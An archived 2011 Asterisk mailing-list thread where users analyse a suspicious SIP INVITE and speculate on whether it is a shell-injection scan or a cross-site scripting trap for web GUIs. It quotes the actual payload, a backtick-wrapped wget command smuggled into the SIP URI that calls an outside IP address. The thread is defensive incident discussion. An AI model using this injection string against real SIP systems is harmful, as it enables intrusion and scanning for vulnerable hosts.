[asterisk-users] new sort of shell attack attempt via SIP?

Tom Browning ttbrowning at gmail.com
Sun Sep 11 18:35:58 CDT 2011


I disagree with the 'review CDR' angle for a number of reasons:

a) there is a backtick in the URI trying to force shell and the proper
wget command line to send results to /dev/null
b) the V.php (at the url) appears to do nothing at all and might just
be empty (for log scraping), url safety checks confirm
c) the invites were sprayed across my entire IP address range

To me, this is more like a scan for any SIP host that has shell
injection vulerability.  The list of vulnerable hosts is just a log
scrape away at the server 91.223.89.94



On Sun, Sep 11, 2011 at 7:20 PM, Alex Balashov
<abalashov at evaristesys.com> wrote:
> On 09/11/2011 07:05 PM, Tom Browning wrote:
>
>> INVITE
>> sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
>> SIP/2.0.
>
> My guess is that this attack presumes you are running a web GUI such as
> FreePBX, and that it does not sanitise embedded HTML.  Thus, when reviewing
> your CDRs, for instance, you might click on such a link.
>
> A more sophisticated variant of that would embed <script> tags and a with a
> shortened URL (overall small enough to fit inside a SIP display name field
> or whatnot) to effectuate a cross-site scripting attack.
>
> --
> Alex Balashov - Principal
> Evariste Systems LLC
> 260 Peachtree Street NW
> Suite 2200
> Atlanta, GA 30303
> Tel: +1-678-954-0670
> Fax: +1-404-961-1892
> Web: http://www.evaristesys.com/
>
> --
> _____________________________________________________________________
> -- Bandwidth and Colocation Provided by http://www.api-digital.com --
> New to Asterisk? Join us for a live introductory webinar every Thurs:
>              http://www.asterisk.org/hello
>
> asterisk-users mailing list
> To UNSUBSCRIBE or update options visit:
>  http://lists.digium.com/mailman/listinfo/asterisk-users
>



More information about the asterisk-users mailing list